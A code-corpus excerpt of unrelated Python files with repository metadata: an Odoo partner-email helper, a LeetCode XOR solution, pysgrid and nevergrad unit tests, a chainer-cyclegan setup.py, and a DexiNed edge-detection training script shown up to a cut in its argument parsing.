ee9570ac547bccf91a414edc9b5d73e065cfd695 | 9f26388284fb7900d28f64c0a87dc9d042661f3d | /linggajati_membership/models/models.py | 9efb1861ca20d505287e40bbe39a4e101f4d2fd6 | [] | no_license | suningwz/gnbs-project-module | 574742744e8a4a8bee0719cd7764d17d423719d6 | 4122376edfa6663b072b8f2946b036bd814ee7ef | refs/heads/main | 2023-04-15T16:21:32.473932 | 2021-04-30T01:32:25 | 2021-04-30T01:32:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from odoo import api, fields, models
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.model
def get_all_data(self):
# result = {}
result = []
res_partner = self.env['res.partner'].search([])
# print('rest partner :', res_partner)
# print('email :', res_partner['id'])
# Dictionary
# i = -1
# for data in res_partner:
# i += 1
# result['email'].appenddata.email
# result['id'] = data.id
# print('result ',i,' : ',result['email'])
# print('result ',i,' : ',result['id'])
# print(result)
# i = -1
for data in res_partner:
# i += 1
result.append(data.email)
# print('email ',i,' : ',result[i])
# print('result :',result)
return(result) | [
"abuabdirohman4@gmail.com"
] | abuabdirohman4@gmail.com |
45a1d583380f1466e5d9bdfac955d73b744aaf1a | d295d1b46b4694095587e36be504b44369fde06f | /chapter_19/136_Single_Number.py | 06d7bebec25f148d1e159568c1981b195217bf8c | [] | no_license | AIFFEL-coma-team01/Sanghyo | 3f58acb31d834591c50027dd974cfc236132b13a | 1e3b7c85157fa4fb437e0e12896331fb84451a90 | refs/heads/master | 2023-04-24T06:25:09.701974 | 2021-05-11T15:38:22 | 2021-05-11T15:38:22 | 329,206,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | '''
Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
비어 있지 않은 정수 배열이 주어지면 모든 요소는 하나를 제외하고 두 번 나타납니다. 그 하나를 찾으십시오.
Follow up: Could you implement a solution with a linear runtime complexity and without using extra memory?
후속 조치 : 추가 메모리를 사용하지 않고 선형 런타임 복잡성으로 솔루션을 구현할 수 있나요?
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1
'''
# 딱 하나를 제외하고 모든 에ㅔㄹ리먼트는 2개씩 있다. 1개인 엘리먼트를 찾아라
# 배타적 OR = XOR 을 활용한 문제풀이
# 0 0 = 0
# 0 1 = 1
# 1 1 = 1
# 1 1 = 0
# 입력이 서로 다르면 True
# 입력이 서로 동일하면 False
# 따라서, 배열의 모든 요소를 XOR연산 하면 한번만 등장하는 요소만 남게 됨
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
result = 0
for num in nums:
result ^= num
return result
#96 ms
'''
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.sort()
i=0
while (i<len(nums)):
if len(nums)==1:
return nums[i]
if nums[i]==nums[i+1]:
nums.remove(nums[i])
nums.remove(nums[i])
#print(nums)
else:
return nums[i]
'''
| [
"howixxxxu@gmail.com"
] | howixxxxu@gmail.com |
0305bffab91530450d963a852da22b235312750e | 41d1e085dc3ec6c329b8d6443035e1e8a1c93bcc | /gridded/tests/test_pysgrid/test_processing_2d.py | dc315187cf10aeba2e0c9777265a7f8e7304e614 | [
"Unlicense"
] | permissive | Ocean1125/gridded | 9252d3d89ecacc55c59a0ecf6fd60fe6ac0afd6e | 90cca5edf4c8d9a47914c2b6d6f78180d9c280a5 | refs/heads/master | 2023-05-15T13:21:34.144583 | 2021-06-03T21:50:01 | 2021-06-03T21:50:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,341 | py | """
Created on Apr 3, 2015
@author: ayan
"""
from __future__ import (absolute_import, division, print_function)
import pytest
import numpy as np
from gridded.pysgrid.processing_2d import avg_to_cell_center, rotate_vectors, vector_sum
def test_vector_sum():
x_vector = np.array([3, 5, 9, 11])
y_vector = np.array([4, 12, 40, 60])
sum_result = vector_sum(x_vector, y_vector)
expected = np.array([5, 13, 41, 61])
np.testing.assert_almost_equal(sum_result, expected)
@pytest.fixture
def rotate_vectors_data():
x = np.array([3, 5, 9, 11])
y = np.array([4, 12, 40, 60])
angles_simple = np.array([0, np.pi / 2, 0, np.pi / 2])
angles_complex = np.array([np.pi / 6, np.pi / 5,
np.pi / 4, np.pi / 3])
return x, y, angles_simple, angles_complex
def test_vector_rotation_simple(rotate_vectors_data):
x, y, angles_simple, angles_complex = rotate_vectors_data
rotated_x, rotated_y = rotate_vectors(x, y, angles_simple)
expected_x = np.array([3, -12, 9, -60])
expected_y = np.array([4, 5, 40, 11])
np.testing.assert_almost_equal(rotated_x, expected_x, decimal=3)
np.testing.assert_almost_equal(rotated_y, expected_y, decimal=3)
def test_vector_rotation_complex(rotate_vectors_data):
x, y, angles_simple, angles_complex = rotate_vectors_data
rotated_x, rotated_y = rotate_vectors(x, y, angles_complex)
expected_x = np.array([0.5981, -3.0083, -21.9203, -46.4615])
expected_y = np.array([4.9641, 12.6471, 34.6482, 39.5263])
np.testing.assert_almost_equal(rotated_x, expected_x, decimal=3)
np.testing.assert_almost_equal(rotated_y, expected_y, decimal=3)
@pytest.fixture
def avg_center_data():
return np.array([[4, 5, 9, 10], [8, 39, 41, 20], [5, 29, 18, 71]])
def test_no_transpose(avg_center_data):
data = avg_center_data
avg_result = avg_to_cell_center(data, 1)
expected = np.array([[4.5, 7, 9.5],
[23.5, 40, 30.5],
[17, 23.5, 44.5]])
np.testing.assert_almost_equal(avg_result, expected, decimal=3)
def test_with_transpose(avg_center_data):
data = avg_center_data
avg_result = avg_to_cell_center(data, 0)
expected = np.array([[6, 22, 25, 15], [6.5, 34, 29.5, 45.5]])
np.testing.assert_almost_equal(avg_result, expected, decimal=3)
| [
"Chris.Barker@noaa.gov"
] | Chris.Barker@noaa.gov |
69b97a113143d549bb453db303f2de95572d0f28 | c9133d4769c73a07ed758321173be45fa342dc89 | /nevergrad/functions/powersystems/test_core.py | bb9a1893289c4bc1783d715ecde45308c1b77c59 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Dvermetten/nevergrad | dd1d2c6d483e13bc292b40fe07c8669f38c7e065 | 850418e9e4d00ee2e4fc12d8fc7a6981b0152641 | refs/heads/master | 2022-12-31T05:22:56.887260 | 2020-10-14T10:30:10 | 2020-10-14T10:30:10 | 276,113,571 | 0 | 0 | MIT | 2020-09-25T12:11:19 | 2020-06-30T13:54:19 | Python | UTF-8 | Python | false | false | 805 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from unittest.mock import patch
import numpy as np
from . import core
def test_powersystem() -> None:
func = core.PowerSystem()
x = [7 * np.random.rand(func.dimension // 13) for _ in range(13)]
value = func.function(x) # should not touch boundaries, so value should be < np.inf
assert value < np.inf
@patch(f"{__name__}.core.plt")
def test_make_plots(mock_plt):
func = core.PowerSystem()
func.losses = [0.1]
func.make_plots("not_valid.png")
assert mock_plt.clf.call_count == 1
assert mock_plt.subplot.call_count == 4
assert mock_plt.savefig.call_count == 1
| [
"noreply@github.com"
] | noreply@github.com |
00d78c4a4adeb9bd9683c99726c067a3d7829696 | 80d9806dfb09858875c77c285a3ce1ce496dbbcd | /setup.py | d418d3608286c45bad5380aed630c48c76ffa793 | [] | no_license | wkentaro/chainer-cyclegan | 86e9a5a3c8aae03caf37940209aa432738478989 | 64b811773802e4d755eebb5110735f8953beb220 | refs/heads/master | 2021-10-23T15:33:26.856556 | 2019-03-18T13:00:07 | 2019-03-18T13:00:07 | 114,517,994 | 13 | 4 | null | 2018-03-30T14:40:41 | 2017-12-17T07:32:05 | Python | UTF-8 | Python | false | false | 982 | py | import subprocess
import sys
from setuptools import find_packages
from setuptools import setup
version = '1.2.5'
if sys.argv[-1] == 'release':
commands = [
'python setup.py sdist upload',
'git tag v{0}'.format(version),
'git push origin master --tag',
]
for cmd in commands:
subprocess.call(cmd, shell=True)
sys.exit(0)
try:
import cv2 # NOQA
except ImportError:
print('Please install OpenCV.')
quit(1)
install_requires = []
with open('requirements.txt') as f:
for req in f:
if req.startswith('-e'):
continue
install_requires.append(req.strip())
setup(
name='chainer-cyclegan',
description='Chainer Implementation of CycleGAN.',
version=version,
packages=find_packages(),
install_requires=install_requires,
author='Kentaro Wada',
author_email='www.kentaro.wada@gmail.com',
url='https://github.com/wkentaro/chainer-cyclegan',
license='MIT',
)
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
0cb1ceb7d98c6a2de4c393b4e2b6c54464cba5f0 | 0a3677a38ad1431d5fe07b5f15c70bbd1ba64741 | /DexiNed/DexiNed-Pytorch/main.py | 3d652142af958f0cfedd1e170e05446e17182f11 | [
"MIT"
] | permissive | Tubbz-alt/sketch2cat-pulse | 5374c8f9dea8e2525a56d2acec8b72ef0787831e | 0f02363757eb072078d5ed866067eefc7df2a233 | refs/heads/master | 2023-01-15T20:20:32.072643 | 2020-07-27T00:20:34 | 2020-07-27T00:20:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,531 | py |
from __future__ import print_function
import os, sys, time
import argparse
import cv2 as cv
import numpy as np
import random # import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import transforms
import kornia as tgm
from model import DexiNet
from losses import weighted_cross_entropy_loss
from dexi_utils import cv_imshow, dataset_info
class testDataset(Dataset):
def __init__(self, data_root, arg = None):
self.data_root = data_root
self.arg = arg
self.transforms = transforms
self.mean_bgr = arg.mean_pixel_values[0:3] if len(arg.mean_pixel_values)==4\
else arg.mean_pixel_values
self.data_index = self._build_index()
def _build_index(self):
sample_indices = []
if not self.arg.test_data == "CLASSIC":
list_name = os.path.join(self.data_root,self.arg.test_list)#os.path.abspath(self.data_root)
with open(list_name,'r') as f:
files = f.readlines()
files = [line.strip() for line in files]
pairs = [line.split() for line in files]
images_path = [line[0] for line in pairs]
labels_path = [line[1] for line in pairs]
sample_indices = [images_path,labels_path]
else:
# for single image testing
images_path = os.listdir(self.data_root)
labels_path = None
sample_indices = [images_path, labels_path]
return sample_indices
def __len__(self):
return len(self.data_index[0])
def __getitem__(self, idx):
# get data sample
# image_path, label_path = self.data_index[idx]
image_path = self.data_index[0][idx]
label_path = self.data_index[1][idx] if not self.arg.test_data=="CLASSIC" else None
img_name = os.path.basename(image_path)
file_name = img_name[:-3]+"png"
# base dir
if self.arg.test_data.upper() == 'BIPED':
img_dir = os.path.join(self.arg.input_val_dir,'imgs','test')
gt_dir = os.path.join(self.arg.input_val_dir,'edge_maps','test')
elif self.arg.test_data.upper() == 'CLASSIC':
img_dir = self.arg.input_val_dir
gt_dir = None
else:
img_dir = self.arg.input_val_dir
gt_dir = self.arg.input_val_dir
# load data
image = cv.imread(os.path.join(img_dir,image_path), cv.IMREAD_COLOR)
if not self.arg.test_data == "CLASSIC":
label = cv.imread(os.path.join(gt_dir,label_path), cv.IMREAD_COLOR)
else:
label=None
im_shape =[image.shape[0],image.shape[1]]
image, label = self.transform(img=image, gt=label)
return dict(images=image, labels=label, file_names=file_name,image_shape=im_shape)
def transform(self, img, gt):
# gt[gt< 51] = 0 # test without gt discrimination
if self.arg.test_data=="CLASSIC":
img_height = img.shape[0] if img.shape[0] % 16 == 0 else ((img.shape[0] // 16) + 1) * 16
img_width = img.shape[1] if img.shape[1] % 16 == 0 else ((img.shape[1] // 16) + 1) * 16
print('Real-size:',img.shape, "Ideal size:",[img_height,img_width])
img = cv.resize(img, (self.arg.test_im_width,self.arg.test_im_height))
gt = None
elif img.shape[0]<512 or img.shape[1]<512:
img = cv.resize(img, (512, 512))
gt = cv.resize(gt, (512, 512))
elif img.shape[0]%16!=0 or img.shape[1]%16!=0:
img_width = ((img.shape[1] // 16) + 1) * 16
img_height = ((img.shape[0] // 16) + 1) * 16
img = cv.resize(img, (img_width, img_height))
gt = cv.resize(gt, (img_width, img_height))
# if self.yita is not None:
# gt[gt >= self.yita] = 1
img = np.array(img, dtype=np.float32)
# if self.rgb:
# img = img[:, :, ::-1] # RGB->BGR
if not self.arg.test_data=="CLASSIC":
gt = np.array(gt, dtype=np.float32)
if len(gt.shape) == 3:
gt = gt[:, :, 0]
gt /= 255.
gt = torch.from_numpy(np.array([gt])).float()
else:
gt = np.zeros((img.shape[:2]))
gt=torch.from_numpy(np.array([gt])).float()
img -= self.mean_bgr
img = img.transpose((2, 0, 1))
img = torch.from_numpy(img.copy()).float()
return img, gt
class BipedMyDataset(Dataset):
    """BIPED edge-detection dataset (RGB images + edge-map ground truth).

    Expects the BIPED directory layout:
        <data_root>/imgs/<train_mode>/<dataset_type>/<data_type>/<dir>/<name>.jpg
        <data_root>/edge_maps/<train_mode>/<dataset_type>/<data_type>/<dir>/<name>.png

    Each sample is returned as ``dict(images=CHW float tensor, labels=1xHxW
    float tensor)`` with the image mean-subtracted (BGR order) and the ground
    truth scaled to [0, 1].
    """

    train_modes = ['train', 'test',]
    dataset_types = ['rgbr',]
    data_types = ['aug',]

    def __init__(self, data_root, train_mode='train', dataset_type='rgbr',
                 is_scaling=None, arg=None):
        """Index the dataset on disk.

        Args:
            data_root: root directory of the BIPED dataset.
            train_mode: one of ``train_modes``.
            dataset_type: one of ``dataset_types``.
            is_scaling: optional multi-scale setting (currently unused).
            arg: parsed CLI namespace; provides mean_pixel_values, img sizes
                and the crop_img flag.
        """
        self.data_root = data_root
        self.train_mode = train_mode
        self.dataset_type = dataset_type
        self.data_type = 'aug'  # be aware that this might change in the future
        self.scale = is_scaling
        self.arg = arg
        # A 4-entry mean list carries an extra (non-BGR) value; keep only BGR.
        self.mean_bgr = arg.mean_pixel_values[0:3] if len(arg.mean_pixel_values) == 4 \
            else arg.mean_pixel_values
        self.data_index = self._build_index()

    def _build_index(self):
        """Return a list of (image_path, label_path) pairs for every sample."""
        assert self.train_mode in self.train_modes, self.train_mode
        assert self.dataset_type in self.dataset_types, self.dataset_type
        assert self.data_type in self.data_types, self.data_type
        sample_indices = []
        data_root = os.path.abspath(self.data_root)
        images_path = os.path.join(data_root, 'imgs', self.train_mode,
                                   self.dataset_type, self.data_type)
        labels_path = os.path.join(data_root, 'edge_maps', self.train_mode,
                                   self.dataset_type, self.data_type)
        for directory_name in os.listdir(images_path):
            image_directories = os.path.join(images_path, directory_name)
            for file_name_ext in os.listdir(image_directories):
                # Strip the 3-char extension + dot; images are .jpg, labels .png.
                file_name = file_name_ext[:-4]
                sample_indices.append(
                    (os.path.join(images_path, directory_name, file_name + '.jpg'),
                     os.path.join(labels_path, directory_name, file_name + '.png'),)
                )
        return sample_indices

    def __len__(self):
        return len(self.data_index)

    def __getitem__(self, idx):
        """Load, transform and return one (image, label) sample as a dict."""
        image_path, label_path = self.data_index[idx]
        image = cv.imread(image_path, cv.IMREAD_COLOR)
        label = cv.imread(label_path, cv.IMREAD_GRAYSCALE)
        image, label = self.transform(img=image, gt=label)
        return dict(images=image, labels=label)

    def transform(self, img, gt):
        """Normalize, crop-or-resize and convert one sample to tensors.

        Args:
            img: HxWx3 image (BGR, uint8 or float).
            gt: HxW (or HxWxC) edge map with values in [0, 255].

        Returns:
            (img, gt): CHW float tensor and 1xHxW float tensor.
        """
        gt = np.array(gt, dtype=np.float32)
        if len(gt.shape) == 3:
            gt = gt[:, :, 0]
        gt /= 255.
        img = np.array(img, dtype=np.float32)
        img -= self.mean_bgr
        crop_size = self.arg.img_height if self.arg.img_height == self.arg.img_width else 400
        if self.arg.crop_img:
            # BUG FIX: img/gt are still HWC numpy arrays at this point.  The
            # previous code called gt.size() (a TypeError on numpy arrays,
            # where .size is an int attribute, not a method) and sliced img
            # channel-first even though the HWC->CHW transpose only happens
            # below.  Crop on the height/width axes instead.
            h, w = gt.shape[:2]
            assert (crop_size < h and crop_size < w)
            i = random.randint(0, h - crop_size)
            j = random.randint(0, w - crop_size)
            img = img[i:i + crop_size, j:j + crop_size, :]
            gt = gt[i:i + crop_size, j:j + crop_size]
        else:
            img = cv.resize(img, dsize=(self.arg.img_width, self.arg.img_height ))
            gt = cv.resize(gt, dsize=(self.arg.img_width, self.arg.img_height ))
        img = img.transpose((2, 0, 1))
        img = torch.from_numpy(img.copy()).float()
        gt = torch.from_numpy(np.array([gt])).float()
        return img, gt
def image_normalization(img, img_min=0, img_max=255):
    """Linearly rescale *img* into the range [img_min, img_max].

    Source: https://en.wikipedia.org/wiki/Normalization_(image_processing)

    :param img: an image (gray scale or color); converted to float32.
    :param img_min: lower bound of the output range (default 0).
    :param img_max: upper bound of the output range (default 255).
    :return: the normalized image as a float array (no uint8 cast is done).
    """
    data = np.float32(img)
    eps = 1e-12  # guards against division by zero on constant images
    lo = np.min(data)
    hi = np.max(data)
    scaled = (data - lo) * (img_max - img_min) / ((hi - lo) + eps)
    return scaled + img_min
def restore_rgb(config,I, restore_rgb=False):
    """
    Undo the mean subtraction (and optionally the channel swap) applied to
    images, then re-normalize each image into displayable range.

    :param config: [args.channel_swap, args.mean_pixel_value]
    :param I: an image or a set of images
    :return: an image or a set of images restored
    """
    # NOTE(review): the first branch only triggers for a *non-ndarray*
    # sequence of more than 3 images (e.g. a python list); a 4-D ndarray
    # batch would fall through to the `elif`, fail its 3-D check and hit the
    # error print below — confirm callers always pass lists for batches.
    if len(I)>3 and not type(I)==np.ndarray:
        I =np.array(I)
        I = I[:,:,:,0:3]  # drop any extra channels beyond BGR
        n = I.shape[0]
        for i in range(n):
            x = I[i,...]
            x = np.array(x, dtype=np.float32)
            x += config[1]  # add the per-channel mean back
            if restore_rgb:
                x = x[:, :, config[0]]  # reorder channels (e.g. BGR -> RGB)
            x = image_normalization(x)
            # write the restored image back into the batch in place
            I[i,:,:,:]=x
    elif len(I.shape)==3 and I.shape[-1]==3:
        # single HWC color image
        I = np.array(I, dtype=np.float32)
        I += config[1]
        if restore_rgb:
            I = I[:, :, config[0]]
        I = image_normalization(I)
    else:
        print("Sorry the input data size is out of our configuration")
    # print("The enterely I data {} restored".format(I.shape))
    return I
def visualize_result(imgs_list, arg):
    """
    Tile the input image, ground truth and every prediction into one
    2-row image matrix for quick visual inspection during training.

    :param imgs_list: a list of prediction, gt and input data (each a batch;
        only element [1] of each batch is visualized)
    :param arg: parsed CLI namespace (channel_swap, mean_pixel_values)
    :return: one uint8 image containing the whole of imgs_list data
    """
    n_imgs = len(imgs_list)
    data_list =[]
    for i in range(n_imgs):
        tmp = imgs_list[i]
        if tmp.shape[1]==3:
            # color input batch (BxCxHxW): take sample 1, go CHW -> HWC and
            # undo the mean subtraction / channel swap for display.
            tmp = np.transpose(np.squeeze(tmp[1]),[1,2,0])
            tmp=restore_rgb([arg.channel_swap,arg.mean_pixel_values[:3]],tmp)
            tmp = np.uint8(image_normalization(tmp))
        else:
            # single-channel map (gt or prediction) of sample 1
            tmp= np.squeeze(tmp[1])
            if len(tmp.shape) == 2:
                tmp = np.uint8(image_normalization(tmp))
                tmp = cv.bitwise_not(tmp)  # invert: edges dark on white
                tmp = cv.cvtColor(tmp, cv.COLOR_GRAY2BGR)
            else:
                tmp = np.uint8(image_normalization(tmp))
        data_list.append(tmp)
    img = data_list[0]
    # Allocate a canvas for 2 rows of ceil(n_imgs/2) tiles with 10px/5px gaps.
    if n_imgs % 2 == 0:
        imgs = np.zeros((img.shape[0] * 2 + 10, img.shape[1] * (n_imgs // 2) + ((n_imgs // 2 - 1) * 5), 3))
    else:
        imgs = np.zeros((img.shape[0] * 2 + 10, img.shape[1] * ((1 + n_imgs) // 2) + ((n_imgs // 2) * 5), 3))
        n_imgs += 1
    k=0
    imgs = np.uint8(imgs)
    i_step = img.shape[0]+10
    j_step = img.shape[1]+5
    for i in range(2):
        for j in range(n_imgs//2):
            if k<len(data_list):
                # paste tile k at grid cell (i, j)
                imgs[i*i_step:i*i_step+img.shape[0],j*j_step:j*j_step+img.shape[1],:]=data_list[k]
                k+=1
            else:
                pass
    return imgs
def create_directory(dir_path):
    """Create *dir_path* (including parents) if it does not already exist.

    Uses ``exist_ok=True`` instead of the previous check-then-create pattern,
    which could raise ``FileExistsError`` when another process created the
    directory between the ``os.path.exists`` check and ``os.makedirs`` call.

    Args:
        dir_path (str): the absolute or relative path of the directory.
    """
    os.makedirs(dir_path, exist_ok=True)
def train(epoch, dataloader, model, criterion, optimizer, device,
          log_interval_vis, tb_writer, args=None):
    """Run one training epoch.

    Args:
        epoch: current epoch index (used only for logging).
        dataloader: yields dicts with 'images' (BxCxHxW) and 'labels' (BxHxW).
        model: network returning a list of side-output predictions.
        criterion: per-output loss; summed over all side outputs.
        optimizer: torch optimizer stepped once per batch.
        device: torch device inputs are moved to.
        log_interval_vis: how many batches between visualization dumps.
        tb_writer: optional tensorboard SummaryWriter.
        args: parsed CLI namespace (output_dir, channel_swap, ...).
    """
    imgs_res_folder =os.path.join(args.output_dir,'current_res')
    create_directory(imgs_res_folder)
    model.train()
    for batch_id, sample_batched in enumerate(dataloader):
        images = sample_batched['images'].to(device)  # BxCxHxW
        labels = sample_batched['labels'].to(device)  # BxHxW
        # labels = labels[:, None] # Bx1xHxW
        preds_list = model(images)
        # Deep supervision: every side output contributes to the loss.
        loss = sum([criterion(preds, labels) for preds in preds_list])
        loss /= images.shape[0]  # the batch size
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        if batch_id%5==0:
            print(time.ctime(),'Epoch: {0} Sample {1}/{2} Loss: {3}' \
                  .format(epoch, batch_id, len(dataloader), loss.item()))
        if tb_writer is not None:
            # Global step so the curve is continuous across epochs.
            tb_writer.add_scalar('data/loss', loss.detach(), (len(dataloader)*epoch+batch_id))
        if batch_id % log_interval_vis == 0:
            # Dump a tiled visualization of input / gt / all side outputs.
            res_data = []
            img = images.cpu().numpy()
            res_data.append(img)
            ed_gt = labels.cpu().numpy()
            res_data.append(ed_gt)
            for i in range(len(preds_list)):
                tmp = preds_list[i]
                tmp = torch.sigmoid(tmp)
                tmp = tmp.cpu().detach().numpy()
                res_data.append(tmp)
            vis_imgs = visualize_result(res_data, arg=args)
            del tmp, res_data
            # Shrink to 80% and stamp the loss text onto the image.
            vis_imgs = cv.resize(vis_imgs,(int(vis_imgs.shape[1]*0.8),int(vis_imgs.shape[0]*0.8)))
            img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
                .format(epoch, batch_id, len(dataloader), loss.item())
            # NOTE(review): named BLACK but the BGR tuple (0, 0, 255) is red.
            BLACK = (0, 0, 255)
            font = cv.FONT_HERSHEY_SIMPLEX
            font_size = 1.1
            font_color = BLACK
            font_thickness = 2
            x, y = 30, 30
            vis_imgs = cv.putText(vis_imgs, img_test, (x, y), font, font_size, font_color, font_thickness, cv.LINE_AA)
            cv.imwrite(os.path.join(imgs_res_folder,'results.png'),vis_imgs)
def save_image_batch_to_disk(tensor, output_dir, file_names, img_shape=None,arg=None):
    """Write predicted edge maps to disk.

    In validation mode (``not arg.is_testing``) *tensor* is one Bx1xHxW
    prediction whose sigmoid is inverted and saved per file name.  In testing
    mode *tensor* is the list of all side outputs; the fused map is written
    under ``<output_dir>/f`` and the average of all maps under
    ``<output_dir>/a``, each resized back to its original image shape.

    Args:
        tensor: prediction tensor (validation) or list of prediction tensors
            (testing).
        output_dir: directory (created if missing) the maps are written to.
        file_names: output file name per batch element.
        img_shape: pair of per-image width/height tensors (testing mode only).
        arg: parsed CLI namespace; only ``is_testing`` is read here.
    """
    os.makedirs(output_dir,exist_ok=True)
    if not arg.is_testing:
        assert len(tensor.shape) == 4, tensor.shape
        for tensor_image, file_name in zip(tensor, file_names):
            image_vis = tgm.utils.tensor_to_image(torch.sigmoid(tensor_image))[..., 0]
            # invert so edges are dark on a white background
            image_vis = (255.0*(1.0- image_vis)).astype(np.uint8) #
            output_file_name = os.path.join(output_dir, file_name)
            assert cv.imwrite(output_file_name, image_vis)
    else:
        output_dir_f = os.path.join(output_dir,'f')
        output_dir_a = os.path.join(output_dir,'a')
        os.makedirs(output_dir_f, exist_ok=True)
        os.makedirs(output_dir_a,exist_ok=True)
        # 255.0 * (1.0 - em_a)
        edge_maps = []
        for i in tensor:
            tmp = torch.sigmoid(i).cpu().detach().numpy()
            edge_maps.append(tmp)
        # edge_maps.append(tmp)
        # tensor is now (num_side_outputs, B, 1, H, W)
        tensor = np.array(edge_maps)
        idx =0
        image_shape = [x.cpu().detach().numpy() for x in img_shape]
        # swap to [width, height] pairs as expected by cv.resize below
        image_shape = [[y, x] for x, y in zip(image_shape[0], image_shape[1])]
        for i_shape, file_name in zip(image_shape,file_names):
            tmp = tensor[:,idx,...]
            tmp = np.transpose(np.squeeze(tmp),[0,1,2])
            preds = []
            for i in range(tmp.shape[0]):
                tmp_img = tmp[i]
                tmp_img[tmp_img<0.0] = 0.0
                tmp_img =255.0 * (1.0 - tmp_img)
                # resize back to the original image size if needed
                if not tmp_img.shape[1]==i_shape[0] or not tmp_img.shape[0]==i_shape[1]:
                    tmp_img = cv.resize(tmp_img,(i_shape[0],i_shape[1]))
                preds.append(tmp_img)
                # NOTE(review): index 6 is assumed to be the fused output; if
                # the model yields fewer than 7 maps, `fuse` below is unbound
                # and the imwrite raises NameError — confirm output count.
                if i==6:
                    fuse = tmp_img
            average = np.array(preds,dtype=np.float32)
            average = np.uint8(np.mean(average,axis=0))
            output_file_name_f = os.path.join(output_dir_f, file_name)
            output_file_name_a = os.path.join(output_dir_a, file_name)
            assert cv.imwrite(output_file_name_f, fuse)
            assert cv.imwrite(output_file_name_a, np.uint8(average))
            idx+=1
def validation(epoch, dataloader, model, device, output_dir, arg=None):
    """Run the model over the validation set and dump edge maps to disk.

    Callers are expected to wrap this in ``torch.no_grad()`` (see the
    training loop in ``main``); this function only switches to eval mode.

    Removed dead code from the previous version: ``total_losses`` was built
    but never used, and ``labels`` was copied to the device without ever
    being read.

    Args:
        epoch: current epoch index (kept for interface compatibility; unused).
        dataloader: validation loader yielding dicts with 'images' and
            'file_names'.
        model: network to evaluate.
        device: torch device inputs are moved to.
        output_dir: directory predicted maps are written to.
        arg: parsed CLI namespace forwarded to save_image_batch_to_disk.
    """
    model.eval()
    for sample_batched in dataloader:
        images = sample_batched['images'].to(device)
        file_names = sample_batched['file_names']
        output = model(images)
        # Only the fused (last) side output is saved during validation.
        save_image_batch_to_disk(output[-1], output_dir, file_names, arg=arg)
def weight_init(m):
    """Per-layer weight initialization, applied via ``model.apply``."""
    if isinstance(m, (nn.Conv2d, )):
        torch.nn.init.normal_(m.weight,mean=0, std=0.01)
        # NOTE(review): comparing an int (shape[1]) against torch.Size([1])
        # is always False, so this branch never runs as written; the intent
        # was probably `m.weight.data.shape[1] == 1` — confirm before fixing,
        # since changing it alters trained-model initialization.
        if m.weight.data.shape[1]==torch.Size([1]):
            torch.nn.init.normal_(m.weight, mean=0.0,)
        # Fusion conv (1 out, 6 in, 1x1): start all side outputs equally
        # weighted at 0.2.
        if m.weight.data.shape==torch.Size([1,6,1,1]):
            torch.nn.init.constant_(m.weight,0.2)
        if m.bias is not None:
            torch.nn.init.zeros_(m.bias)
    # for fusion layer
    if isinstance(m, (nn.ConvTranspose2d,)):
        torch.nn.init.normal_(m.weight,mean=0, std=0.01)
        # NOTE(review): same always-False int vs torch.Size comparison as above.
        if m.weight.data.shape[1] == torch.Size([1]):
            torch.nn.init.normal_(m.weight, std=0.1)
        if m.bias is not None:
            torch.nn.init.zeros_(m.bias)
def main():
    """Entry point: parse CLI arguments, then run DexiNet testing or training.

    Bug fixed here: the validation DataLoader used to be created only inside
    the ``not args.is_testing`` branch, so the testing path crashed with a
    NameError on ``dataloader_val``.  It is needed in both modes and is now
    built unconditionally.
    """
    # Testing settings
    DATASET_NAME= ['BIPED','BSDS','BSDS300','CID','DCD','MULTICUE',
                   'PASCAL','NYUD','CLASSIC'] # 8
    TEST_DATA = DATASET_NAME[8]
    data_inf = dataset_info(TEST_DATA)
    # training settings
    parser = argparse.ArgumentParser(description='Training application.')
    # Data parameters
    parser.add_argument('--input-dir', type=str,default='/opt/dataset/BIPED/edges',
                        help='the path to the directory with the input data.')
    parser.add_argument('--input-val-dir', type=str,default=data_inf['data_dir'],
                        help='the path to the directory with the input data for validation.')
    parser.add_argument('--output_dir', type=str, default='checkpoints',
                        help='the path to output the results.')
    parser.add_argument('--test_data', type=str, default=TEST_DATA,
                        help='Name of the dataset.')
    parser.add_argument('--test_list', type=str, default=data_inf['file_name'],
                        help='Name of the dataset.')
    # NOTE(review): argparse `type=bool` treats any non-empty string as True;
    # passing "--is_testing False" on the command line still yields True.
    parser.add_argument('--is_testing', type=bool, default=True,
                        help='Just for testing')
    parser.add_argument('--use_prev_trained', type=bool, default=True,
                        help='use previous trained data') # Just for test
    parser.add_argument('--checkpoint_data', type=str, default='24/24_model.pth',
                        help='Just for testing') # '19/19_*.pht'
    parser.add_argument('--test_im_width', type=int, default=data_inf['img_width'],
                        help='image height for testing')
    parser.add_argument('--test_im_height', type=int, default=data_inf['img_height'],
                        help=' image height for testing')
    parser.add_argument('--res_dir', type=str, default='result',
                        help='Result directory')
    parser.add_argument('--log-interval-vis', type=int, default=50,
                        help='how many batches to wait before logging training status')
    # Optimization parameters
    parser.add_argument('--optimizer', type=str, choices=['adam', 'sgd'], default='adam',
                        help='the optimization solver to use (default: adam)')
    parser.add_argument('--num-epochs', type=int, default=25, metavar='N',
                        help='number of training epochs (default: 100)')
    parser.add_argument('--wd', type=float, default=1e-5, metavar='WD',
                        help='weight decay (default: 1e-5)')
    parser.add_argument('--lr', default=1e-4, type=float,
                        help='Initial learning rate.')
    parser.add_argument('--lr_stepsize', default=1e4, type=int,
                        help='Learning rate step size.')
